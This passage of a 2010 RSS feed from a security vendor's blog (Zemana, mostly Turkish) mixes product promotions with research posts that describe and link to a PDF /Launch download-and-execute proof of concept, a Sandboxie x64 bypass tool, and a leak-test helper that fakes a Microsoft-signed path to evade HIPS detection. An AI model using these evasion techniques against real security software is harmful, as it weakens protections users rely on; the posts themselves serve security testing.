Turkcell gibi artik Avea aboneleride, herhangi bir kayıt veya işlem yapmadan, &lt;a href="http://www.zemana.com/TR/AntiloggerOverview.aspx"&gt;Zemana AntiLogger&lt;/a&gt;'ı %20 indirim ile sadece 20TL'ye tek bir SMS ile &lt;a href="http://www.mikro-odeme.com/sale-api/tr/step1.aspx?partner=10388&amp;amp;product=306"&gt;satın alabilecekler&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Avea Mobil Ödeme hakkında daha fazla bilgi için &lt;a href="http://www.avea.com.tr/tr/sta/bireysel/servisler/ozel/mobilodeme.shtml?pagemenu=servisler.mobilodeme"&gt;tıklayın&lt;/a&gt;!.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-349738246363464185?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/16hupWOMFXk/avea-mobil-odeme-ile-zemana-antilogger.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_W_bgBWwE23o/S8WrQYjudFI/AAAAAAAAAPk/GGHpQDbT2HE/s72-c/avea-mobil-odeme-zemana.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://blog.zemana.com/2010/04/avea-mobil-odeme-ile-zemana-antilogger.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-4405710936504875610</guid><pubDate>Wed, 07 Apr 2010 19:30:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.131+03:00</atom:updated><title>Escape From PDF modified by Zemana</title><description>PDF security specialist &lt;a href="http://blog.didierstevens.com/"&gt;Didier Stevens&lt;/a&gt; of Belgium discovered a functionality defined in the PDF specification, which is launch a command and run an executable within a PDF file without JavaScript.&lt;br /&gt;
&lt;br /&gt;
We modified Didier Stevens's &lt;a href="http://didierstevens.com/files/data/launch-action-cmd.zip"&gt;PDF /Launch PoC&lt;/a&gt; in order to demonstrate that it is possible to make a PDF to download and execute a malware. Watch the &lt;a href="http://www.youtube.com/watch?v=La6uN1l7mPw&amp;amp;feature=player_embedded"&gt;video&lt;/a&gt;!&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.foxitsoftware.com/"&gt;Foxit Reader&lt;/a&gt; users please not that it issues no warning when launching a command!&lt;br /&gt;
&lt;br /&gt;
Really there's some crazy stuff in the &lt;a href="http://www.adobe.com/devnet/acrobat/pdfs/PDF32000_2008.pdf"&gt;PDF specification&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;object height="385" width="480"&gt;&lt;param name="movie" value="http://www.youtube.com/v/La6uN1l7mPw&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/La6uN1l7mPw&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-4405710936504875610?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/1gLCskJMgK4/escape-from-pdf-modified-by-zemana.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><thr:total>4</thr:total><feedburner:origLink>http://blog.zemana.com/2010/04/escape-from-pdf-modified-by-zemana.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-7254174150082912569</guid><pubDate>Thu, 18 Mar 2010 17:58:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.136+03:00</atom:updated><title>Zemana V8 Supercars</title><description>Eski bir Formula pilotu olan &lt;a href="http://www.motorsport.com/news/article.asp?ID=360413&amp;amp;FS="&gt;Aaren Russell&lt;/a&gt;'den çok umutluyduk ancak iki pilotumuzda malesef yarışlarda iyi bir derece elde edemedi :(&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://s1020.photobucket.com/albums/af326/rodzilla666/Zemana%20Racing%20-%20Fujitsu%20Series%20V8%20Supercars%202010/?albumview=slideshow"&gt;Slideshow'u izlemek için tıklayın. &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://s1020.photobucket.com/albums/af326/rodzilla666/Zemana%20Racing%20-%20Fujitsu%20Series%20V8%20Supercars%202010/?albumview=slideshow" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="426" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S6JpshfXjzI/AAAAAAAAAOs/Za6xIH9pLSY/s640/v8R5-6Clip-06698.jpg" vt="true" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-7254174150082912569?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/oFcAoJ8Jq1g/zemana-v8-supercars.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_W_bgBWwE23o/S6JpshfXjzI/AAAAAAAAAOs/Za6xIH9pLSY/s72-c/v8R5-6Clip-06698.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/zemana-v8-supercars.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-5862038712908517935</guid><pubDate>Thu, 18 Mar 2010 11:09:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.141+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AntiLoger</category><title>MRG Online Bankacılık ve Tarayıcı Güvenlik Testi - Mart 2010</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/S6IHpSlRBZI/AAAAAAAAAOk/gwX3RFGS68A/s1600-h/MGR-Test.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;img border="0" height="232" src="http://3.bp.blogspot.com/_W_bgBWwE23o/S6IHpSlRBZI/AAAAAAAAAOk/gwX3RFGS68A/s640/MGR-Test.png" vt="true" width="640" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://malwareresearchgroup.com/?page_id=3"&gt;MRG (Malware Research Group)&lt;/a&gt;,&amp;nbsp;dünyaca ünlü 10&amp;nbsp;sesgisel güvenlik programı ile bağımsız bir &lt;a href="http://malwareresearchgroup.com/wp-content/uploads/Sveta/2009/01/MRG-Online-Banking-Security-Test-Mar-2010.pdf"&gt;test&lt;/a&gt; yaptı. Testin amacı, sanal bankacılık işlemlerinde, güvenlik programlarının, tarayıcıyı ve şifreleri ne denli koruduğu.&lt;br /&gt;
&lt;br /&gt;
10 program içinde birinciliği &lt;a href="http://www.prevx.com/"&gt;PrevX&lt;/a&gt;'e kaptırıp ikinci olduk. PrevX işini çok iyi yapan bir firma, hatta yakında kendileri ile bir takım ortaklıklarımız olacak. Yinede bu skor bizim için çok iyi çünkü test sadece internet tarayıcılar üzerinde oldu, yoksa AntiLogger sadece tarayıcıları değil, e-mail client'ler den VPN araçlarına kadar çok geniş bir yalpazeyi koruma kapsamına alıyor.&lt;br /&gt;
&lt;br /&gt;
Bu test, 2 hafta önce olsaydı, birinci biz olacaktık ancak bu testten önce, Anti-SSL teknolojimizi PrevX ile paylaştık ve onlarda SSL zararlılarına karşı, SafeOnline v3.0.5.74 sürümünden itibaren koruma sağlamaya başladılar ve testte puan kaybetmediler.&lt;br /&gt;
&lt;br /&gt;
Puan kaybettigimiz nokta ise, çok karmaşık bir kernel keylogger yüzünden oldu. İlgili keylogger, yapısı itibari ile sadece PS/2 arayüzünü kullanan klavyeler ile çalışabiliyor&amp;nbsp;ve günümüzde popülar olan USB klavyeler ile çalışmıyor ama tabiki ilerki sürümlerde bu zararlıya karşı önlem alacağız.&lt;br /&gt;
&lt;br /&gt;
MRG'nın tam raporuna &lt;a href="http://malwareresearchgroup.com/wp-content/uploads/Sveta/2009/01/MRG-Online-Banking-Security-Test-Mar-2010.pdf"&gt;buradan&lt;/a&gt; ulaşabilirsiniz.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;UPDATE:&lt;/strong&gt; MRG testlerindeki ilgili açıklar &lt;a href="http://zemana.com/Frames/NewFeeds.aspx"&gt;AntiLogger 1.9.2.196 (Monday, March 22, 2010)&lt;/a&gt; sürümünde kapatıldı, güncellemeleri yapmanızı önemle tavsiye ederiz.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-5862038712908517935?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/wC6azKiy4gY/online-banking-browser-security-test.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_W_bgBWwE23o/S6IHpSlRBZI/AAAAAAAAAOk/gwX3RFGS68A/s72-c/MGR-Test.png" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/online-banking-browser-security-test.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-7768918384351174442</guid><pubDate>Wed, 17 Mar 2010 12:10:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.147+03:00</atom:updated><title>Zemana - SoftPedia Ortaklığı ile AntiLogger Hediye</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_W_bgBWwE23o/S6DDCdSk1WI/AAAAAAAAAOU/O_VPmiS73fc/s1600-h/Zemana-Softpedia-free.PNG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="102" src="http://4.bp.blogspot.com/_W_bgBWwE23o/S6DDCdSk1WI/AAAAAAAAAOU/O_VPmiS73fc/s400/Zemana-Softpedia-free.PNG" vt="true" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Crack kullanımın azaltmak ve aynı zamanda marka bilinirliğimizi arttırmak için dunyaca ünlü&amp;nbsp;&lt;a href="http://www.softpedia.com/"&gt;Softpedia&lt;/a&gt; ile bir anlaşma yaptık. Bu anlaşma kapsamında, Zemana AntiLogger 1 hafta boyunca 1 yıllık ücretsiz olarak kullanıcılara hediye ediliyor. &lt;br /&gt;
&lt;br /&gt;
Yaptığımız anlaşmada, Softpedia, sitede heryerde dönenecek bir baner koydu, ve bu zaman zarfında, haftanın en iyilerinde birinci sırıya Zemana AntiLogger'i aldı ve ek olarak çok olumlu ve derin bir &lt;a href="http://www.softpedia.com/reviews/windows/Zemana-AntiLogger-Review-137615.shtml"&gt;değerlendirme yazısı&lt;/a&gt; yazıp en üstte tuttu. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_W_bgBWwE23o/S6DD7Faip5I/AAAAAAAAAOc/5tRkrN9fexk/s1600-h/zemana-softpedia-review.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S6DD7Faip5I/AAAAAAAAAOc/5tRkrN9fexk/s320/zemana-softpedia-review.png" vt="true" /&gt;&lt;/a&gt;&lt;/div&gt;Aynı zamanda &lt;a href="http://www.google.com/search?q=zemana+1+year+free+at+softpedia"&gt;binlerce sitede&lt;/a&gt; ilgili promasyon yayınlandı ve neredeyse mevcut kullanıcılarımızın yarısı kadar bir download gerçekleşti. &lt;br /&gt;
&lt;br /&gt;
Softpedia'nin hitlerinin çok iyi olduğunu tahmin ediyorduk ancak bükadarını beklemiyorduk. Romanialı download sitesi bizi çok şaşırttı!!!&lt;br /&gt;
&lt;br /&gt;
Bu ortaklıkta Softpedia'nın ne kazancı var diye soruyorsunuzdur? Tüm bu download'lardan geri dönecek satışlarda %50 ortaklığı var :)&lt;br /&gt;
&lt;br /&gt;
Umarız illegal kullanımının bir nebze olsada bu şekilde önüne geçmiş oluruz. &lt;br /&gt;
&lt;br /&gt;
Kampanyanın bugün son günü, geç kalmadan &lt;a href="http://www.zemana.com/softpedia"&gt;ücretsiz&lt;/a&gt; sürümü indirebilirsiniz.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-7768918384351174442?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/bfUlgVis7Rw/zemana-softpedia-ortaklg-ile-antilogger.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_W_bgBWwE23o/S6DDCdSk1WI/AAAAAAAAAOU/O_VPmiS73fc/s72-c/Zemana-Softpedia-free.PNG" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/zemana-softpedia-ortaklg-ile-antilogger.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-5556298420155421440</guid><pubDate>Fri, 12 Mar 2010 15:51:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.152+03:00</atom:updated><title>Sandboxie Bypass (x64)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/S5pgwuSs-WI/AAAAAAAAAOM/jf_ZxNTOKvU/s1600-h/sandboxie_bypass.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_W_bgBWwE23o/S5pgwuSs-WI/AAAAAAAAAOM/jf_ZxNTOKvU/s320/sandboxie_bypass.png" vt="true" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Daha önceki &lt;a href="http://blog.zemana.com/2010/03/windows-64-bit-sistemlerde-savunma.html"&gt;yazımda&lt;/a&gt; x64 için, şu anda bu türde korumaların olamayacağından bahsetmiştim. Ve sandbox yazılımlarının arasında en güvenilir olan sandboxie programını, x64 sistemde bypass eden bir örnek uygulama yapacağımı söylemiştim, buradan &lt;a href="http://zemana.com/download/research/sandboxie_bypass.zip"&gt;download&lt;/a&gt; edebilirsiniz. Yapmanız gereken uygulamayı sandboxie içinde çalıştırmak ve onay vermek. Uygulama Sandboxie'yi hemen kapatacaktir.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;strong&gt;NOT:&lt;/strong&gt; Sadece Windows 7 x64(Intel) üzerinde test edilmiştir. Vista'da yada AMD işlemcilerde çalışmayabilir.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;NOT:&lt;/strong&gt; x86 Sandboxie kullacılarının endişelenmesine gerek yok, Sandboxie bu tür yöntemler ile x86 sistemler üzerinde kolay kolay kill edilemez.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-5556298420155421440?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/4Yfg_Aodklk/sandboxie-bypass-x64.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_W_bgBWwE23o/S5pgwuSs-WI/AAAAAAAAAOM/jf_ZxNTOKvU/s72-c/sandboxie_bypass.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/sandboxie-bypass-x64.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-3146995585760600454</guid><pubDate>Thu, 11 Mar 2010 18:03:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.156+03:00</atom:updated><title>Windows 64 bit Sistemlerde Savunma</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S5kubJsWTuI/AAAAAAAAAOE/ixwvrjhLfxE/s1600-h/windows-vista-64bit-cd.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S5kubJsWTuI/AAAAAAAAAOE/ixwvrjhLfxE/s200/windows-vista-64bit-cd.jpg" vt="true" width="150" /&gt;&lt;/a&gt;&lt;/div&gt;Bize son zamanlarda en çok gelen soru; Neden AntiLogger x64 desteklemiyor?&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Microsoft 64 bit işletim sistemlerinde, rootkit'leri önlemek için &lt;a href="http://blogs.msdn.com/windowsvistasecurity/archive/2006/08/11/695993.aspx"&gt;PatchGuard&lt;/a&gt; adında bir sistem geliştirdi. PatchGuard, Windows kernel'de herhangi bir değişiklik yapılıp yapımadığına bakıyor ve eğer değişiklik yapılmış ise sistemi çökertiyor(BSOD). Kernel tabanlı rootkit'ler , sistemde gizlenebilmek için çekirde bir dizi değişiklik yapmak zorunda olduğu için x64 üzerinde çalışamıyorlar. Aynı zamanda AntiLogger gibi proactive koruma yapan programlarda, sistemde olup biteni takip edebilmek için değişiklik yapmak zorunda&amp;nbsp; ve doğal olarak bunu yapamadığı için x64'de çalışamıyor.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PatchGuard, kernel'de aşsağıdaki bölgeleri kontrol altında tutuyor:&lt;br /&gt;
System service tables (SDT).&lt;br /&gt;
Interrupt descriptor table (IDT).&lt;br /&gt;
Global descriptor table (GDT)&lt;br /&gt;
Kernel stack &amp;amp; heap (Bunun için donanım desteği, dahada doğrusu AMD64 işlemci gerekiyor )&lt;br /&gt;
&lt;br /&gt;
Başta Symantec olmak üzere tüm endüstri liderleri, en başından beri PatchGuard'a karşı çıktılar ve Microsoft'un bu politikasını değiştirmesini yada sadece sertifikalı güvenlik üreticilerinin kullabileceği bir SDK yapmasını istediler. Bu baskılar sonucunda Microsoft , Vista SP1'den sonra bir dizi SDK geliştirdi. Ancak bunlar çok yetersiz kaldı, çünkü SDT üzerinde IPC'den LPC'ye kadar 500'den fazla, servis(API)'si bulunuyor ve bunların hepsini, kernel'i modifie etmeden kontrol etmek mümkün olmuyor.&lt;br /&gt;
&lt;br /&gt;
Symantec, daha PatchGuard çıkmadan , bunu hackerlerin bypass edeceğini söylemişti ve nitekim öylede oldu. Rootkitler PatchGuard'i bypass edilebiliyorlar. Yani PatchGuard sadece güvenlik üreticilerini durdurdu!!! Şimdi içinizden soruyorsunuzdur; neden güvenlik üreticileride, rootkitler gibi PatchGuard'i bypass edip çalışmıyorlar? Çünkü Microsoft uyarıyor: &lt;br /&gt;
&lt;blockquote&gt;"&lt;strong&gt;Yeni bir güncellemede, PatchGuard mekanizmasını değiştirebiliriz ve kernel'i modifie olmuş sistemler çökerler"&lt;/strong&gt;&lt;/blockquote&gt;Bu durumda, ilgili rootkit yüklü olan makinaların hepsi mavi ekran verecek ve rootkit, sistem başlıngıcında başladığı için bilgaşayar format atılmadan tekrar açılamayacak. &lt;br /&gt;
&lt;br /&gt;
Tabi rootkit yazarları için bu bir endişe değil, onlar zaten zararlı yazıyorlar ve ileride bu makinaların çökmesini umursamıyolar. Ancak bizler böyle bir riski kesinlikle göze alamayız.&lt;br /&gt;
&lt;br /&gt;
PatchGuard bypass edilmeden, belli bir yere kadar koruma sağlanabiliyor ancak güvenli değil, örneğin en popüler ve en güvenli sandbox uygulaması olan &lt;a href="http://www.sandboxie.com/"&gt;Sandboxie&lt;/a&gt;'nin şimdiye kadar x64 desteği yoktu ancak üyelerinden öyle bir tepki aldılarki, 64bit desteğini vermek zorunda kaldılar tabi bunu PatchGuard bypass ederek değilde, bir takım User Mode hook destekleri ile yaptılar ve heryerde de açıkladılar 32bit kadar güvenli olmadığını. &lt;br /&gt;
&lt;br /&gt;
Bende bir Sandboxie fanatiği olarak, Sandboxie'in 64 bit sürümü çıktığı gibi şöyle bir göz attım ve bypass etmek için ne yapmam gerektiğini saniyeler içinde anladım, henüz teoride ne yapacağımı bilsemde, pratikte uygulamayı yazmadım ama ilerleyen günlerde yazıp sizinle paylaşacağım. Bu uygulamayı yazarsam Sandboxie'e rapor etmeme gerek yok çünkü bir exploit veya açık değil, ama 32bit sanboxie için bunu yapabilsem bu bir exploit olur ve sadece üreticiye bildirirdim.&lt;br /&gt;
&lt;br /&gt;
Şandboxie yazarları, gerçekten çok ileri Windows kernel cambazları, x86 sürümünü bypass etmek için bir çok kere&amp;nbsp;deneme yaptım ve başaramadım, başaranıda henüz görmedim.&lt;br /&gt;
&lt;br /&gt;
Özetlemek gerekirse x64 üzerinde sezgisel(proactive) HIPS,Firewall,Sandbox yada benzeri koruma şu an için &lt;strong&gt;%100 mümkün değil&lt;/strong&gt;. Ancak çok yakında, Microsoft buna bir çare üretecektir ve ozaman bizde x64 AntiLogger'i yayınlayacağız inşallah.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-3146995585760600454?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/wb8BsY8zFU4/windows-64-bit-sistemlerde-savunma.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_W_bgBWwE23o/S5kubJsWTuI/AAAAAAAAAOE/ixwvrjhLfxE/s72-c/windows-vista-64bit-cd.jpg" height="72" width="72" /><thr:total>11</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/windows-64-bit-sistemlerde-savunma.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-6747584711350938024</guid><pubDate>Thu, 11 Mar 2010 15:21:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.161+03:00</atom:updated><title>Zemana Extreme Leak Test Runner</title><description>&lt;div class="separator" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S5kI_nrbqqI/AAAAAAAAAN8/-SRsugPGcTg/s320/Zemana+Extreme+Leak+Test+Runner.png" vt="true" /&gt;&lt;a href="http://zemana.com/download/Products/Simulations/ZemanaExtreme.exe"&gt;&lt;/a&gt;&lt;span id="goog_1268320454932"&gt;&lt;/span&gt;&lt;span id="goog_1268320454933"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Yeni bir simulasyon aracı geliştirdik. Bu aracın kendisi direk bir Leak Test değil ancak diğer Leak Tesler ile kullanıldığında, ilgi teslerin güvenlik programlarınca yakalanmasını güçleştiriyor.&lt;br /&gt;
&lt;br /&gt;
Örneğin bu araç ile &lt;a href="http://www.softpedia.com/get/Security/Firewall/Anti-KeyLogger-Tester.shtml"&gt;AKLT&lt;/a&gt; testini başlatırsanız, görüceksinizki, AKLT'yi daha önceden yakalayabilen bir çok HIPS(Anti Keylogger etc.)&amp;nbsp;bu şekilde yakalıyamıyacak.&lt;br /&gt;
&lt;br /&gt;
NOT: Program özellikle Windows XP için optimize edildi. Vista ve Windows 7'de çalışabiliyor ancak XP'de olduğu kadar iyi sonuç vermiyor bu yüzden testlerinizi XP üzerinde yapmanızı tavsiye ederiz.&lt;br /&gt;
&lt;br /&gt;
Programın çalışmasını kısaca özetlemek gerekirse; çalıştırdığı programın orjinal yolunu microsoft imzalı bir dosya gibi gösteriyor, bu da bir çok HIPS programını yanıltıyor.&lt;br /&gt;
&lt;br /&gt;
Programı, bizim kendi simülasyon teslerimiz ile de deneyebilirsiniz.&lt;br /&gt;
AntiLogger 1.1.2.416 (30.06.2008) sürümden beri bu tür saldırıları onliyebiliyor. &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://zemana.com/download/Products/Simulations/ZemanaExtreme.exe"&gt;DOWNLOAD&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;strong&gt;We&amp;nbsp;would like to present to you a new leak test tool called Zemana Extreme Leak Test Runner.&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;strong&gt;This tool itself is not a leak tester, instead it makes your favorite leak tester to be harder to detect by security solutions. Currently, full functionality is available only on XP. It also runs on Vista and Windows7 but with some limitations. For best results, you must test it on XP systems. Later we will release full functional version for Vista and Windows7. You can use this tool with our leak tests, AKLT or any other tests.&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-6747584711350938024?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/Q9y6TQ_03jM/zemana-extreme-leak-test-runner.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_W_bgBWwE23o/S5kI_nrbqqI/AAAAAAAAAN8/-SRsugPGcTg/s72-c/Zemana+Extreme+Leak+Test+Runner.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/zemana-extreme-leak-test-runner.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-7236147286679392144</guid><pubDate>Wed, 10 Mar 2010 11:35:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.166+03:00</atom:updated><title>Zemana V8 Supercars are Ready</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S5eDhxt5ljI/AAAAAAAAAN0/tcWXL7Zpx1I/s1600-h/bg_countdown.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S5eDhxt5ljI/AAAAAAAAAN0/tcWXL7Zpx1I/s320/bg_countdown.png" vt="true" /&gt;&lt;/a&gt;&lt;/div&gt;Daha önce &lt;a href="http://blog.zemana.com/2010/03/zemana-v8-supercars-on-clipsal-500.html"&gt;bahsetmiş&lt;/a&gt; olduğum Zemana-V8 arablar hazırlandı. Fotoğraflara &lt;a href="http://www.flickr.com/photos/zemana/"&gt;buradan&lt;/a&gt; bakabilirsiniz. Yarışlar bugün başlıyor ve 4 gün sürecek, ilerleyen zamanlarda da videoları paylaşacağım.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.flickr.com/photos/zemana/" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="426" src="http://3.bp.blogspot.com/_W_bgBWwE23o/S5eAD5-umiI/AAAAAAAAANs/R1u6Sl0qaEE/s640/Zemana+Race+Team+003c.jpg" vt="true" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-7236147286679392144?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/7pjlZa-QBQM/zemana-v8-supercars-are-ready.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_W_bgBWwE23o/S5eDhxt5ljI/AAAAAAAAAN0/tcWXL7Zpx1I/s72-c/bg_countdown.png" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/zemana-v8-supercars-are-ready.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-3680857312500407903</guid><pubDate>Thu, 04 Mar 2010 09:18:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.172+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AntiLoger</category><title>Türkiyede HTTPS/SSL Hırsızlığı (Part1)</title><description>&lt;div 